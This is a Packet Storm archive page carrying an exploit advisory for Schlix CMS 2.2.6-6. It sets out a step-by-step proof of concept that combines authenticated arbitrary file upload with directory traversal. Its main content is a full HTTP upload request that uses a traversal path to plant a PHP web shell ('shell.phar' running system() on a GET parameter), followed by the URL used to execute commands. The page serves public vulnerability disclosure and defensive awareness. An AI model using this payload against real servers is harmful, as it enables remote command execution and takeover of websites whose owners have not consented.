exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Schlix CMS 2.2.6-6 Shell Upload / Directory Traversal

Schlix CMS 2.2.6-6 Shell Upload / Directory Traversal
Posted May 24, 2021
Authored by Emir Polat

Schlix CMS version 2.2.6-6 suffers from an arbitrary file upload and a directory traversal that together can lead to remote command execution.

tags | exploit, remote, arbitrary, file inclusion, file upload
SHA-256 | fca5df7ad0d34a5f7b8addf705a53ad2dd0527cb631c1a47240bfd8afd22f8d1

Schlix CMS 2.2.6-6 Shell Upload / Directory Traversal

Change Mirror Download
# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
# Date: 21.05.2021
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: 2.2.6-6
# Tested On: Ubuntu 20.04 (Firefox)

############################################################################################################

Summary: An authorized user can upload a file with a .phar extension
to a path of his choice and control the content as he wishes. This causes RCE vulnerability.

For full technical details and source code analysis:
https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.

############################################################################################################

PoC:

1-) Login to admin panel with true credentials and go to "Tools ->
Mediamanager" menu from left side.

2-) Click the "Upload File" and upload a file and catch the request with Burp.

3-) Change the "uploadstartpath", "filename" and file content as follows.

# Request

POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
Host: vulnerable-server
Content-Length: 846
X-Schlix-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
Accept: */*
Origin: http:// <http://10.211.55.4/>vulnerable-server
Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
<http://10.211.55.4/schlix/admin/app/core.mediamanager>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
schlix-your-cookie;__atuvc=5%7C20;
schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2;
schlix_frontendedit_control_showdoc=-2
Connection: close

------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="_csrftoken"

{your_csrf_token}
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="uploadstartpath"

/media/docs/....//....//....//....//system/images/avatars/large/
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"

<?PHP system($_GET['rce']);?>

------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__total_file_size"

0
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__max_file_count"

20
------WebKitFormBoundarybllOFLruz1WAs7K2--


4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close